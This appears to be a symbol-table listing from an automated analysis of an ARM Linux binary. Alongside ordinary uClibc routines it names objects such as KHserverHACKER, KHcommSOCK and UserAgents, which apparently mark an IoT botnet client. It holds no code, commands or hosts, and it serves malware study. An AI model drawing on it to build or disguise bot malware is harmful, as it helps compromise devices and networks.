                        $a.symtab0x172c00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x173300NOTYPE<unknown>DEFAULT2
                        $a.symtab0x173700NOTYPE<unknown>DEFAULT2
                        $a.symtab0x174c40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x17c640NOTYPE<unknown>DEFAULT2
                        $a.symtab0x17d200NOTYPE<unknown>DEFAULT2
                        $a.symtab0x17dbc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x17efc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x180cc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x181fc0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x182900NOTYPE<unknown>DEFAULT2
                        $a.symtab0x187200NOTYPE<unknown>DEFAULT2
                        $a.symtab0x188140NOTYPE<unknown>DEFAULT2
                        $a.symtab0x188880NOTYPE<unknown>DEFAULT2
                        $a.symtab0x188c80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x189780NOTYPE<unknown>DEFAULT2
                        $a.symtab0x18a540NOTYPE<unknown>DEFAULT2
                        $a.symtab0x18a9c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x18ae00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x18af80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x18be00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x18c200NOTYPE<unknown>DEFAULT2
                        $a.symtab0x18d100NOTYPE<unknown>DEFAULT2
                        $a.symtab0x18fa80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x18fc00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x18fe40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1901c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1906c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x197200NOTYPE<unknown>DEFAULT2
                        $a.symtab0x198800NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1988c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x199c40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x19a200NOTYPE<unknown>DEFAULT2
                        $a.symtab0x19ae00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x19b0c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x19bc80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x19bf80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x19ec40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1a2700NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1a3640NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1aae40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1ab240NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1ab640NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1af700NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1afec0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b0340NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b3280NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b3540NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b3c40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b4140NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b4800NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b4900NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b4c00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b5a80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b65c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b6b80NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b6c40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b8a40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b8d00NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b94c0NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1b9f40NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1bb340NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1bf340NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1c4600NOTYPE<unknown>DEFAULT2
                        $a.symtab0x1c5880NOTYPE<unknown>DEFAULT2
                        $d.symtab0x290040NOTYPE<unknown>DEFAULT6
                        $d.symtab0x2900c0NOTYPE<unknown>DEFAULT7
                        $d.symtab0x81180NOTYPE<unknown>DEFAULT2
                        $d.symtab0x81740NOTYPE<unknown>DEFAULT2
                        $d.symtab0x290200NOTYPE<unknown>DEFAULT9
                        $d.symtab0x1c60c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x290240NOTYPE<unknown>DEFAULT9
                        $d.symtab0x81c00NOTYPE<unknown>DEFAULT2
                        $d.symtab0x290280NOTYPE<unknown>DEFAULT9
                        $d.symtab0x87740NOTYPE<unknown>DEFAULT2
                        $d.symtab0x88440NOTYPE<unknown>DEFAULT2
                        $d.symtab0x89ac0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x8adc0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x93c40NOTYPE<unknown>DEFAULT2
                        $d.symtab0x97880NOTYPE<unknown>DEFAULT2
                        $d.symtab0x99180NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1d3200NOTYPE<unknown>DEFAULT4
                        $d.symtab0x9a680NOTYPE<unknown>DEFAULT2
                        $d.symtab0xa0280NOTYPE<unknown>DEFAULT2
                        $d.symtab0xa4480NOTYPE<unknown>DEFAULT2
                        $d.symtab0xa4ac0NOTYPE<unknown>DEFAULT2
                        $d.symtab0xb5e40NOTYPE<unknown>DEFAULT2
                        $d.symtab0xbd300NOTYPE<unknown>DEFAULT2
                        $d.symtab0xbe680NOTYPE<unknown>DEFAULT2
                        $d.symtab0xc5840NOTYPE<unknown>DEFAULT2
                        $d.symtab0xcb500NOTYPE<unknown>DEFAULT2
                        $d.symtab0xdb6c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0xe8740NOTYPE<unknown>DEFAULT2
                        $d.symtab0xeb480NOTYPE<unknown>DEFAULT2
                        $d.symtab0xf4d00NOTYPE<unknown>DEFAULT2
                        $d.symtab0xf5800NOTYPE<unknown>DEFAULT2
                        $d.symtab0xf64c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0xf7e00NOTYPE<unknown>DEFAULT2
                        $d.symtab0x290dc0NOTYPE<unknown>DEFAULT9
                        $d.symtab0x1044c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x104f00NOTYPE<unknown>DEFAULT2
                        $d.symtab0x105380NOTYPE<unknown>DEFAULT2
                        $d.symtab0x105ac0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1063c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x107c80NOTYPE<unknown>DEFAULT2
                        $d.symtab0x11cfc0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x290e00NOTYPE<unknown>DEFAULT9
                        $d.symtab0x290e80NOTYPE<unknown>DEFAULT9
                        $d.symtab0x11d080NOTYPE<unknown>DEFAULT2
                        $d.symtab0x11d380NOTYPE<unknown>DEFAULT2
                        $d.symtab0x11e9c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x11eac0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x11f580NOTYPE<unknown>DEFAULT2
                        $d.symtab0x290f00NOTYPE<unknown>DEFAULT9
                        $d.symtab0x1fab80NOTYPE<unknown>DEFAULT4
                        $d.symtab0x126a80NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1292c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x129700NOTYPE<unknown>DEFAULT2
                        $d.symtab0x12e8c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x2922c0NOTYPE<unknown>DEFAULT9
                        $d.symtab0x132b80NOTYPE<unknown>DEFAULT2
                        $d.symtab0x134800NOTYPE<unknown>DEFAULT2
                        $d.symtab0x134a40NOTYPE<unknown>DEFAULT2
                        $d.symtab0x135880NOTYPE<unknown>DEFAULT2
                        $d.symtab0x136240NOTYPE<unknown>DEFAULT2
                        $d.symtab0x137040NOTYPE<unknown>DEFAULT2
                        $d.symtab0x139940NOTYPE<unknown>DEFAULT2
                        $d.symtab0x142a00NOTYPE<unknown>DEFAULT2
                        $d.symtab0x292300NOTYPE<unknown>DEFAULT9
                        $d.symtab0x143b80NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1471c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x14b680NOTYPE<unknown>DEFAULT2
                        $d.symtab0x14bac0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x14ca00NOTYPE<unknown>DEFAULT2
                        $d.symtab0x292480NOTYPE<unknown>DEFAULT9
                        $d.symtab0x14d180NOTYPE<unknown>DEFAULT2
                        $d.symtab0x14da40NOTYPE<unknown>DEFAULT2
                        $d.symtab0x14e3c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x14eb80NOTYPE<unknown>DEFAULT2
                        $d.symtab0x292600NOTYPE<unknown>DEFAULT9
                        $d.symtab0x14f940NOTYPE<unknown>DEFAULT2
                        $d.symtab0x150200NOTYPE<unknown>DEFAULT2
                        $d.symtab0x150f80NOTYPE<unknown>DEFAULT2
                        $d.symtab0x151c80NOTYPE<unknown>DEFAULT2
                        $d.symtab0x206e40NOTYPE<unknown>DEFAULT4
                        $d.symtab0x153740NOTYPE<unknown>DEFAULT2
                        $d.symtab0x153f00NOTYPE<unknown>DEFAULT2
                        $d.symtab0x2930c0NOTYPE<unknown>DEFAULT9
                        $d.symtab0x154b00NOTYPE<unknown>DEFAULT2
                        $d.symtab0x155ac0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x155dc0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x15b6c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x15c1c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x15c680NOTYPE<unknown>DEFAULT2
                        $d.symtab0x15d000NOTYPE<unknown>DEFAULT2
                        $d.symtab0x15d440NOTYPE<unknown>DEFAULT2
                        $d.symtab0x15d880NOTYPE<unknown>DEFAULT2
                        $d.symtab0x15ff80NOTYPE<unknown>DEFAULT2
                        $d.symtab0x293240NOTYPE<unknown>DEFAULT9
                        $d.symtab0x1611c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x161980NOTYPE<unknown>DEFAULT2
                        $d.symtab0x162580NOTYPE<unknown>DEFAULT2
                        $d.symtab0x163e40NOTYPE<unknown>DEFAULT2
                        $d.symtab0x164ac0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x165480NOTYPE<unknown>DEFAULT2
                        $d.symtab0x207600NOTYPE<unknown>DEFAULT4
                        $d.symtab0x166a40NOTYPE<unknown>DEFAULT2
                        $d.symtab0x2f58c0NOTYPE<unknown>DEFAULT10
                        $d.symtab0x166bc0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x16a440NOTYPE<unknown>DEFAULT2
                        $d.symtab0x16cb80NOTYPE<unknown>DEFAULT2
                        $d.symtab0x170540NOTYPE<unknown>DEFAULT2
                        $d.symtab0x17c400NOTYPE<unknown>DEFAULT2
                        $d.symtab0x2078c0NOTYPE<unknown>DEFAULT4
                        $d.symtab0x17d100NOTYPE<unknown>DEFAULT2
                        $d.symtab0x17dac0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x17ed40NOTYPE<unknown>DEFAULT2
                        $d.symtab0x180ac0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x181f80NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1880c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x189700NOTYPE<unknown>DEFAULT2
                        $d.symtab0x18a4c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x18bd80NOTYPE<unknown>DEFAULT2
                        $d.symtab0x18d0c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x18fdc0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x190180NOTYPE<unknown>DEFAULT2
                        $d.symtab0x199b40NOTYPE<unknown>DEFAULT2
                        $d.symtab0x19ebc0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1a2680NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1aaac0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1ab200NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1ab600NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1af2c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1afd80NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1b6c00NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1b89c0NOTYPE<unknown>DEFAULT2
                        $d.symtab0x1b9480NOTYPE<unknown>DEFAULT2
                        $d.symtab0x293340NOTYPE<unknown>DEFAULT9
                        /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        C.1.3452.symtab0x2076024OBJECT<unknown>DEFAULT4
                        C.147.6056.symtab0x1ea4040OBJECT<unknown>DEFAULT4
                        C.177.6343.symtab0x1eaac16OBJECT<unknown>DEFAULT4
                        C.178.6344.symtab0x1ea8020OBJECT<unknown>DEFAULT4
                        KHcommSOCK.symtab0x2935c4OBJECT<unknown>DEFAULT10
                        KHserverHACKER.symtab0x290cc4OBJECT<unknown>DEFAULT9
                        LOCAL_ADDR.symtab0x2f5b84OBJECT<unknown>DEFAULT10
                        Laligned.symtab0x130680NOTYPE<unknown>DEFAULT2
                        Llastword.symtab0x130840NOTYPE<unknown>DEFAULT2
                        Q.symtab0x2937816384OBJECT<unknown>DEFAULT10
                        UserAgents.symtab0x2903c144OBJECT<unknown>DEFAULT9
                        _Exit.symtab0x11c4840FUNC<unknown>DEFAULT2
                        _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                        _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        __CTOR_END__.symtab0x290080OBJECT<unknown>DEFAULT6
                        __CTOR_LIST__.symtab0x290040OBJECT<unknown>DEFAULT6
                        __C_ctype_b.symtab0x290e04OBJECT<unknown>DEFAULT9
                        __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        __C_ctype_b_data.symtab0x1f4b8768OBJECT<unknown>DEFAULT4
                        __C_ctype_tolower.symtab0x293344OBJECT<unknown>DEFAULT9
                        __C_ctype_tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        __C_ctype_tolower_data.symtab0x20858768OBJECT<unknown>DEFAULT4
                        __C_ctype_toupper.symtab0x290e84OBJECT<unknown>DEFAULT9
                        __C_ctype_toupper.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        __C_ctype_toupper_data.symtab0x1f7b8768OBJECT<unknown>DEFAULT4
                        __DTOR_END__.symtab0x290100OBJECT<unknown>DEFAULT7
                        __DTOR_LIST__.symtab0x2900c0OBJECT<unknown>DEFAULT7
                        __EH_FRAME_BEGIN__.symtab0x290000OBJECT<unknown>DEFAULT5
                        __FRAME_END__.symtab0x290000OBJECT<unknown>DEFAULT5
                        __GI___C_ctype_b.symtab0x290e04OBJECT<unknown>HIDDEN9
                        __GI___C_ctype_tolower.symtab0x293344OBJECT<unknown>HIDDEN9
                        __GI___C_ctype_toupper.symtab0x290e84OBJECT<unknown>HIDDEN9
                        __GI___ctype_b.symtab0x290e44OBJECT<unknown>HIDDEN9
                        __GI___ctype_tolower.symtab0x293384OBJECT<unknown>HIDDEN9
                        __GI___ctype_toupper.symtab0x290ec4OBJECT<unknown>HIDDEN9
                        __GI___errno_location.symtab0x11d0012FUNC<unknown>HIDDEN2
                        __GI___fcntl_nocancel.symtab0x11b68100FUNC<unknown>HIDDEN2
                        __GI___fgetc_unlocked.symtab0x180cc304FUNC<unknown>HIDDEN2
                        __GI___glibc_strerror_r.symtab0x1348820FUNC<unknown>HIDDEN2
                        __GI___h_errno_location.symtab0x166b412FUNC<unknown>HIDDEN2
                        __GI___libc_fcntl.symtab0x11b04100FUNC<unknown>HIDDEN2
                        __GI___sigaddset.symtab0x139bc36FUNC<unknown>HIDDEN2
                        __GI___sigdelset.symtab0x139e036FUNC<unknown>HIDDEN2
                        __GI___sigismember.symtab0x1399836FUNC<unknown>HIDDEN2
                        __GI___uClibc_fini.symtab0x15ca4108FUNC<unknown>HIDDEN2
                        __GI___uClibc_init.symtab0x15d4876FUNC<unknown>HIDDEN2
                        __GI___xpg_strerror_r.symtab0x134a8232FUNC<unknown>HIDDEN2
                        __GI__exit.symtab0x11c4840FUNC<unknown>HIDDEN2
                        __GI_abort.symtab0x14bb0256FUNC<unknown>HIDDEN2
                        __GI_atoi.symtab0x151cc12FUNC<unknown>HIDDEN2
                        __GI_brk.symtab0x18fe456FUNC<unknown>HIDDEN2
                        __GI_clock_getres.symtab0x161a444FUNC<unknown>HIDDEN2
                        __GI_close.symtab0x11ca044FUNC<unknown>HIDDEN2
                        __GI_closedir.symtab0x16320212FUNC<unknown>HIDDEN2
                        __GI_config_close.symtab0x169e448FUNC<unknown>HIDDEN2
                        __GI_config_open.symtab0x16a1452FUNC<unknown>HIDDEN2
                        __GI_config_read.symtab0x166c0804FUNC<unknown>HIDDEN2
                        __GI_connect.symtab0x1370c44FUNC<unknown>HIDDEN2
                        __GI_dup2.symtab0x118f044FUNC<unknown>HIDDEN2
                        __GI_errno.symtab0x2f58c4OBJECT<unknown>HIDDEN10
                        __GI_execl.symtab0x15b8c148FUNC<unknown>HIDDEN2
                        __GI_execve.symtab0x1615844FUNC<unknown>HIDDEN2
                        __GI_exit.symtab0x15378148FUNC<unknown>HIDDEN2
                        __GI_fclose.symtab0x16b64368FUNC<unknown>HIDDEN2
                        __GI_fcntl.symtab0x11b04100FUNC<unknown>HIDDEN2
                        __GI_fflush_unlocked.symtab0x17efc464FUNC<unknown>HIDDEN2
                        __GI_fgetc.symtab0x17c64188FUNC<unknown>HIDDEN2
                        __GI_fgetc_unlocked.symtab0x180cc304FUNC<unknown>HIDDEN2
                        __GI_fgets.symtab0x17d20156FUNC<unknown>HIDDEN2
                        __GI_fgets_unlocked.symtab0x181fc148FUNC<unknown>HIDDEN2
                        __GI_fopen.symtab0x16cd412FUNC<unknown>HIDDEN2
                        __GI_fork.symtab0x119f444FUNC<unknown>HIDDEN2
                        __GI_fputs_unlocked.symtab0x12ebc52FUNC<unknown>HIDDEN2
                        __GI_fseek.symtab0x1988012FUNC<unknown>HIDDEN2
                        __GI_fseeko64.symtab0x1988c312FUNC<unknown>HIDDEN2
                        __GI_fstat.symtab0x1901c80FUNC<unknown>HIDDEN2
                        __GI_fwrite_unlocked.symtab0x12ef0172FUNC<unknown>HIDDEN2
                        __GI_getc_unlocked.symtab0x180cc304FUNC<unknown>HIDDEN2
                        __GI_getdtablesize.symtab0x11ab040FUNC<unknown>HIDDEN2
                        __GI_getegid.symtab0x161fc8FUNC<unknown>HIDDEN2
                        __GI_geteuid.symtab0x119ec8FUNC<unknown>HIDDEN2
                        __GI_getgid.symtab0x1625c8FUNC<unknown>HIDDEN2
                        __GI_gethostbyname.symtab0x136b48FUNC<unknown>HIDDEN2
                        __GI_gethostbyname2.symtab0x136bc80FUNC<unknown>HIDDEN2
                        __GI_gethostbyname2_r.symtab0x18d10664FUNC<unknown>HIDDEN2
                        __GI_gethostbyname_r.symtab0x1b034756FUNC<unknown>HIDDEN2
                        __GI_gethostname.symtab0x1b354112FUNC<unknown>HIDDEN2
                        __GI_getpagesize.symtab0x1618424FUNC<unknown>HIDDEN2
                        __GI_getpid.symtab0x119ac8FUNC<unknown>HIDDEN2
                        __GI_getrlimit.symtab0x161d044FUNC<unknown>HIDDEN2
                        __GI_getsockname.symtab0x1373844FUNC<unknown>HIDDEN2
                        __GI_getuid.symtab0x1619c8FUNC<unknown>HIDDEN2
                        __GI_h_errno.symtab0x2f5904OBJECT<unknown>HIDDEN10
                        __GI_htonl.symtab0x1363c32FUNC<unknown>HIDDEN2
                        __GI_htons.symtab0x1362820FUNC<unknown>HIDDEN2
                        __GI_inet_addr.symtab0x1369036FUNC<unknown>HIDDEN2
                        __GI_inet_aton.symtab0x18c20240FUNC<unknown>HIDDEN2
                        __GI_inet_ntop.symtab0x1a004620FUNC<unknown>HIDDEN2
                        __GI_inet_pton.symtab0x19cc4512FUNC<unknown>HIDDEN2
                        __GI_initstate_r.symtab0x15104200FUNC<unknown>HIDDEN2
                        __GI_ioctl.symtab0x11bf880FUNC<unknown>HIDDEN2
                        __GI_isatty.symtab0x1359032FUNC<unknown>HIDDEN2
                        __GI_kill.symtab0x11ad844FUNC<unknown>HIDDEN2
                        __GI_lseek64.symtab0x1b414100FUNC<unknown>HIDDEN2
                        __GI_memchr.symtab0x18720244FUNC<unknown>HIDDEN2
                        __GI_memcpy.symtab0x130d04FUNC<unknown>HIDDEN2
                        __GI_memmove.symtab0x1b4804FUNC<unknown>HIDDEN2
                        __GI_mempcpy.symtab0x18ae024FUNC<unknown>HIDDEN2
                        __GI_memrchr.symtab0x18978220FUNC<unknown>HIDDEN2
                        __GI_memset.symtab0x12fa0156FUNC<unknown>HIDDEN2
                        __GI_mmap.symtab0x1603496FUNC<unknown>HIDDEN2
                        __GI_mremap.symtab0x162bc48FUNC<unknown>HIDDEN2
                        __GI_munmap.symtab0x1626444FUNC<unknown>HIDDEN2
                        __GI_nanosleep.symtab0x1629044FUNC<unknown>HIDDEN2
                        __GI_ntohl.symtab0x1367032FUNC<unknown>HIDDEN2
                        __GI_ntohs.symtab0x1365c20FUNC<unknown>HIDDEN2
                        __GI_open.symtab0x1192492FUNC<unknown>HIDDEN2
                        __GI_opendir.symtab0x164b0156FUNC<unknown>HIDDEN2
                        __GI_pipe.symtab0x1198044FUNC<unknown>HIDDEN2
                        __GI_poll.symtab0x1b32844FUNC<unknown>HIDDEN2
                        __GI_raise.symtab0x18fa824FUNC<unknown>HIDDEN2
                        __GI_random.symtab0x14cb4124FUNC<unknown>HIDDEN2
                        __GI_random_r.symtab0x14f98140FUNC<unknown>HIDDEN2
                        __GI_rawmemchr.symtab0x188c8176FUNC<unknown>HIDDEN2
                        __GI_read.symtab0x11a8444FUNC<unknown>HIDDEN2
                        __GI_readdir64.symtab0x165e0212FUNC<unknown>HIDDEN2
                        __GI_recv.symtab0x1379444FUNC<unknown>HIDDEN2
                        __GI_recvfrom.symtab0x137c052FUNC<unknown>HIDDEN2
                        __GI_sbrk.symtab0x1620488FUNC<unknown>HIDDEN2
                        __GI_select.symtab0x11a5448FUNC<unknown>HIDDEN2
                        __GI_send.symtab0x137f444FUNC<unknown>HIDDEN2
                        __GI_sendto.symtab0x1382052FUNC<unknown>HIDDEN2
                        __GI_setsockopt.symtab0x1385448FUNC<unknown>HIDDEN2
                        __GI_setstate_r.symtab0x14ed0200FUNC<unknown>HIDDEN2
                        __GI_sigaction.symtab0x160b0116FUNC<unknown>HIDDEN2
                        __GI_sigaddset.symtab0x138b048FUNC<unknown>HIDDEN2
                        __GI_sigemptyset.symtab0x138e020FUNC<unknown>HIDDEN2
                        __GI_signal.symtab0x138f4164FUNC<unknown>HIDDEN2
                        __GI_sigprocmask.symtab0x11c7048FUNC<unknown>HIDDEN2
                        __GI_sleep.symtab0x1540c168FUNC<unknown>HIDDEN2
                        __GI_socket.symtab0x1388444FUNC<unknown>HIDDEN2
                        __GI_sprintf.symtab0x11d3c52FUNC<unknown>HIDDEN2
                        __GI_srandom_r.symtab0x15024224FUNC<unknown>HIDDEN2
                        __GI_stat.symtab0x1b3c480FUNC<unknown>HIDDEN2
                        __GI_strcasecmp.symtab0x1b8d0124FUNC<unknown>HIDDEN2
                        __GI_strchr.symtab0x1339c236FUNC<unknown>HIDDEN2
                        __GI_strchrnul.symtab0x18af8232FUNC<unknown>HIDDEN2
                        __GI_strcmp.symtab0x130b028FUNC<unknown>HIDDEN2
                        __GI_strcoll.symtab0x130b028FUNC<unknown>HIDDEN2
                        __GI_strcpy.symtab0x132c036FUNC<unknown>HIDDEN2
                        __GI_strcspn.symtab0x1888864FUNC<unknown>HIDDEN2
                        __GI_strdup.symtab0x1b49048FUNC<unknown>HIDDEN2
                        __GI_strlen.symtab0x1304096FUNC<unknown>HIDDEN2
                        __GI_strncpy.symtab0x132e4184FUNC<unknown>HIDDEN2
                        __GI_strnlen.symtab0x131e8216FUNC<unknown>HIDDEN2
                        __GI_strpbrk.symtab0x18be064FUNC<unknown>HIDDEN2
                        __GI_strrchr.symtab0x18a9c68FUNC<unknown>HIDDEN2
                        __GI_strspn.symtab0x18a5472FUNC<unknown>HIDDEN2
                        __GI_strstr.symtab0x130f0248FUNC<unknown>HIDDEN2
                        __GI_strtok.symtab0x1349c12FUNC<unknown>HIDDEN2
                        __GI_strtok_r.symtab0x18814116FUNC<unknown>HIDDEN2
                        __GI_strtol.symtab0x151d88FUNC<unknown>HIDDEN2
                        __GI_sysconf.symtab0x155cc1472FUNC<unknown>HIDDEN2
                        __GI_tcgetattr.symtab0x135b0120FUNC<unknown>HIDDEN2
                        __GI_time.symtab0x119b48FUNC<unknown>HIDDEN2
                        __GI_times.symtab0x162ec8FUNC<unknown>HIDDEN2
                        __GI_toupper.symtab0x11ccc52FUNC<unknown>HIDDEN2
                        __GI_uname.symtab0x1b8a444FUNC<unknown>HIDDEN2
                        __GI_vfork.symtab0x118c040FUNC<unknown>HIDDEN2
                        __GI_vsnprintf.symtab0x11d70180FUNC<unknown>HIDDEN2
                        __GI_wait4.symtab0x1612c44FUNC<unknown>HIDDEN2
                        __GI_waitpid.symtab0x11a208FUNC<unknown>HIDDEN2
                        __GI_wcrtomb.symtab0x16a4880FUNC<unknown>HIDDEN2
                        __GI_wcsnrtombs.symtab0x16ab8172FUNC<unknown>HIDDEN2
                        __GI_wcsrtombs.symtab0x16a9832FUNC<unknown>HIDDEN2
                        __GI_write.symtab0x11bcc44FUNC<unknown>HIDDEN2
                        __JCR_END__.symtab0x290140OBJECT<unknown>DEFAULT8
                        __JCR_LIST__.symtab0x290140OBJECT<unknown>DEFAULT8
                        __adddf3.symtab0x1bb40736FUNC<unknown>HIDDEN2
                        __aeabi_cdcmpeq.symtab0x1c51020FUNC<unknown>HIDDEN2
                        __aeabi_cdcmple.symtab0x1c51020FUNC<unknown>HIDDEN2
                        __aeabi_cdrcmple.symtab0x1c4f448FUNC<unknown>HIDDEN2
                        __aeabi_d2uiz.symtab0x1c58884FUNC<unknown>HIDDEN2
                        __aeabi_dadd.symtab0x1bb40736FUNC<unknown>HIDDEN2
                        __aeabi_dcmpeq.symtab0x1c52420FUNC<unknown>HIDDEN2
                        __aeabi_dcmpge.symtab0x1c56020FUNC<unknown>HIDDEN2
                        __aeabi_dcmpgt.symtab0x1c57420FUNC<unknown>HIDDEN2
                        __aeabi_dcmple.symtab0x1c54c20FUNC<unknown>HIDDEN2
                        __aeabi_dcmplt.symtab0x1c53820FUNC<unknown>HIDDEN2
                        __aeabi_ddiv.symtab0x1c25c516FUNC<unknown>HIDDEN2
                        __aeabi_dmul.symtab0x1bf34808FUNC<unknown>HIDDEN2
                        __aeabi_drsub.symtab0x1bb340FUNC<unknown>HIDDEN2
                        __aeabi_dsub.symtab0x1bb3c740FUNC<unknown>HIDDEN2
                        __aeabi_f2d.symtab0x1be7464FUNC<unknown>HIDDEN2
                        __aeabi_i2d.symtab0x1be4844FUNC<unknown>HIDDEN2
                        __aeabi_idiv.symtab0x1b9f40FUNC<unknown>HIDDEN2
                        __aeabi_idiv0.symtab0x118704FUNC<unknown>HIDDEN2
                        __aeabi_idivmod.symtab0x1bb1c24FUNC<unknown>HIDDEN2
                        __aeabi_l2d.symtab0x1bec8108FUNC<unknown>HIDDEN2
                        __aeabi_ldiv0.symtab0x118704FUNC<unknown>HIDDEN2
                        __aeabi_ui2d.symtab0x1be2040FUNC<unknown>HIDDEN2
                        __aeabi_uidiv.symtab0x115b00FUNC<unknown>HIDDEN2
                        __aeabi_uidivmod.symtab0x116a824FUNC<unknown>HIDDEN2
                        __aeabi_ul2d.symtab0x1beb4128FUNC<unknown>HIDDEN2
                        __app_fini.symtab0x2f5844OBJECT<unknown>HIDDEN10
                        __atexit_lock.symtab0x2930c24OBJECT<unknown>DEFAULT9
                        __bss_end__.symtab0x2faa80NOTYPE<unknown>DEFAULTSHN_ABS
                        __bss_start.symtab0x293400NOTYPE<unknown>DEFAULTSHN_ABS
